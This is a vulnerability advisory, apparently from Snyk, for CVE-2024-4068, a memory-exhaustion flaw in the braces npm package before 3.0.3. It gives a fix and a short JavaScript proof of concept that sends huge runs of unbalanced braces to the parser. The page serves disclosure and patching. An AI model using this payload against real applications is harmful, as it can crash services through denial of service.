Uncontrolled resource consumption Affecting braces package, versions <3.0.3
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (17th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-BRACES-6838727
- published 13 May 2024
- disclosed 13 May 2024
- credit Mário Teixeira
Introduced: 13 May 2024
CVE-2024-4068 Open this link in a new tabHow to fix?
Upgrade braces to version 3.0.3 or higher.
Overview
braces is a Bash-like brace expansion, implemented in JavaScript.
Affected versions of this package are vulnerable to Uncontrolled resource consumption due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
References
CVSS Scores
version 3.1